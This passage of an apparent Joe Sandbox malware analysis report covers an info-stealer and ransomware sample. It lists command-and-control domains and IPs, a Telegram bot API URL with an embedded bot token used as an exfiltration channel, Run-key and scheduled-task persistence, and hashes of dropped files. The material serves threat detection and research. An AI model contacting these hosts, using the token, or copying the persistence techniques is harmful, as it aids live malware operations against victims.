                                                                                                                                                                                          https://api.telegram.org/n)acc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://ocsp.sectigo.com0cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://chrome.google.com/webstore%cc6f25572f.exe, 00000010.00000003.2756924171.000002B0C1B4A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754614693.000002B0C1B36000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756665074.000002B0C1B43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://drive.google.com/drive/installwebapp?usp=chrome_defaultcc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://ipinfo.io/jsong0cc6f25572f.exe, 00000010.00000003.2863634118.000002B0C1B77000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://.cssb6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                        https://chrome.google.com/webstoreLCcc6f25572f.exe, 00000011.00000003.2767408832.000001D66991F000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default8cc6f25572f.exe, 00000010.00000003.2753252739.000002B0C1B18000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2753189352.000002B0C1B08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://sandbox.google.com/payments/v4/js/integrator.js;cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://cheapptaxysu.click:443/api5cda6c90d7.exe, 0000000C.00000002.2878360728.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741012427.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741357547.0000000005E32000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://x1.c.lencr.org/0cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  http://x1.i.lencr.org/0cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://api.telegram.org/cc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.all142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://.jpgb6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                                          https://www.google.com/earchcc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767858563.000001D669944000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766754549.000001D669938000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767490885.000001D66993D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0occ6f25572f.exe, 00000010.00000002.2885993899.000002B0C1AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgcd2469328d.exe, 0000000B.00000003.2663747077.0000000003531000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icocd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://pancakedipyps.click/Lcd2469328d.exe, 0000000B.00000003.2792015764.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2792985078.0000000000D2F000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwYb05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                                                      https://drive-autopush.corp.google.com/cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          https://drive.usercontent.google.com/cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B1A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843354005.000002B0C1B80000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2863634118.000002B0C1B77000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B26000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873269821.000001D669978000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873026803.000001D66996D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://cheapptaxysu.click/apiz25cda6c90d7.exe, 0000000C.00000003.2860832487.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872096119.00000000017D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              https://ipinfo.io/missicc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                https://docs.google.com/presentation/installwebapp?usp=chrome_defaultFcc6f25572f.exe, 00000010.00000003.2753252739.000002B0C1B18000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2753189352.000002B0C1B08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  https://pancakedipyps.click/bucd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2770600450.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793080227.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    https://drive-preprod.corp.googlcc6f25572f.exe, 00000010.00000003.2753529340.000002B0C1B03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      https://cheapptaxysu.click/335cda6c90d7.exe, 0000000C.00000003.2659442912.00000000017A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ycd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgcd2469328d.exe, 0000000B.00000002.2793903700.0000000003530000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            https://drive-daily-6.corp.google.com/cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                              185.215.113.43
                                                                                                                                                                                                                                                              unknownPortugal
                                                                                                                                                                                                                                                              206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                              185.121.15.192
                                                                                                                                                                                                                                                              home.fivetk5sb.topSpain
                                                                                                                                                                                                                                                              207046REDSERVICIOEStrue
                                                                                                                                                                                                                                                              172.217.19.228
                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                              98.85.100.80
                                                                                                                                                                                                                                                              httpbin.orgUnited States
                                                                                                                                                                                                                                                              11351TWC-11351-NORTHEASTUSfalse
                                                                                                                                                                                                                                                              212.193.31.8
                                                                                                                                                                                                                                                              unknownRussian Federation
                                                                                                                                                                                                                                                              57844SPD-NETTRtrue
                                                                                                                                                                                                                                                              142.250.181.132
                                                                                                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                              149.154.167.220
                                                                                                                                                                                                                                                              api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                                                              62041TELEGRAMRUtrue
                                                                                                                                                                                                                                                              172.67.209.202
                                                                                                                                                                                                                                                              pancakedipyps.clickUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              185.156.73.23
                                                                                                                                                                                                                                                              unknownRussian Federation
                                                                                                                                                                                                                                                              48817RELDAS-NETRUfalse
                                                                                                                                                                                                                                                              104.21.89.115
                                                                                                                                                                                                                                                              fieldhitty.clickUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              142.250.181.65
                                                                                                                                                                                                                                                              drive.usercontent.google.comUnited States
                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                              31.41.244.11
                                                                                                                                                                                                                                                              unknownRussian Federation
                                                                                                                                                                                                                                                              61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                                                              104.21.21.99
                                                                                                                                                                                                                                                              discokeyus.latUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              34.117.59.81
                                                                                                                                                                                                                                                              ipinfo.ioUnited States
                                                                                                                                                                                                                                                              139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                              185.215.113.16
                                                                                                                                                                                                                                                              unknownPortugal
                                                                                                                                                                                                                                                              206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                                              216.58.208.238
                                                                                                                                                                                                                                                              drive.google.comUnited States
                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                                                                              185.215.113.206
                                                                                                                                                                                                                                                              unknownPortugal
                                                                                                                                                                                                                                                              206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                              104.21.67.146
                                                                                                                                                                                                                                                              cheapptaxysu.clickUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                                              127.0.0.1
                                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                              Analysis ID:1579386
                                                                                                                                                                                                                                                              Start date and time:2024-12-22 02:14:07 +01:00
                                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                              Overall analysis duration:0h 21m 49s
                                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                              Number of analysed new started processes analysed:54
                                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                                              Sample name:file.exe
                                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                                              Classification:mal100.rans.troj.spyw.evad.winEXE@160/109@40/20
                                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                                              • Successful, ratio: 60%
                                                                                                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                                              • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.17.78, 64.233.162.84, 184.28.90.27, 216.58.208.227, 64.233.164.84, 52.149.20.212, 13.107.246.63, 172.217.17.67, 172.217.19.234, 20.190.147.0, 52.168.117.173, 51.105.71.137, 172.217.19.206, 142.250.181.74
                                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): prod.detectportal.prod.cloudops.mozgcp.net, slscr.update.microsoft.com, spocs.getpocket.com, clientservices.googleapis.com, aus5.mozilla.org, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, contile.services.mozilla.com, content-signature-2.cdn.mozilla.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, push.services.mozilla.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, prod.classify-client.prod.webservices.mozgcp.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, self.events.data.microsoft.com, detectportal.firefox.com, ctldl.windowsupdate.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, youtube.com, shavar.services.mozilla.com, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.com
                                                                                                                                                                                                                                                              • Execution Graph export aborted for target cd2469328d.exe, PID 7808 because there are no executed function
                                                                                                                                                                                                                                                              • Execution Graph export aborted for target cd2469328d.exe, PID 7820 because there are no executed function
                                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                                              01:15:03Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              01:16:39Task SchedulerRun new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              01:16:45Task SchedulerRun new task: MyBootTask path: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              01:16:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                              01:17:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                              01:17:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 142c991362.exe C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              01:17:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exe C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
                                                                                                                                                                                                                                                              01:18:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exe C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe
                                                                                                                                                                                                                                                              01:18:12Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                              01:18:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exe C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe
                                                                                                                                                                                                                                                              01:18:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 142c991362.exe C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              01:18:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exe C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
                                                                                                                                                                                                                                                              01:18:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exe C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe
                                                                                                                                                                                                                                                              01:19:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exe C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe
                                                                                                                                                                                                                                                              01:19:37Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                              20:16:02API Interceptor6566461x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                              20:16:28API Interceptor8x Sleep call for process: cd2469328d.exe modified
                                                                                                                                                                                                                                                              20:16:34API Interceptor8x Sleep call for process: 5cda6c90d7.exe modified
                                                                                                                                                                                                                                                              20:16:39API Interceptor705067x Sleep call for process: Gxtuum.exe modified
                                                                                                                                                                                                                                                              20:17:30API Interceptor542091x Sleep call for process: b6638733e4.exe modified
                                                                                                                                                                                                                                                              20:17:36API Interceptor77x Sleep call for process: graph.exe modified
                                                                                                                                                                                                                                                              20:17:49API Interceptor835x Sleep call for process: 142c991362.exe modified
                                                                                                                                                                                                                                                              20:18:04API Interceptor55278x Sleep call for process: c9d0f96e57.exe modified
                                                                                                                                                                                                                                                              20:18:27API Interceptor775x Sleep call for process: 35f0a75b93.exe modified
                                                                                                                                                                                                                                                              20:18:46API Interceptor6x Sleep call for process: af155ed129.exe modified
                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):156917
                                                                                                                                                                                                                                                              Entropy (8bit):7.994509354006501
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                                                                                                              MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                                                                              SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                                                                              SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                                                                              SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):123394
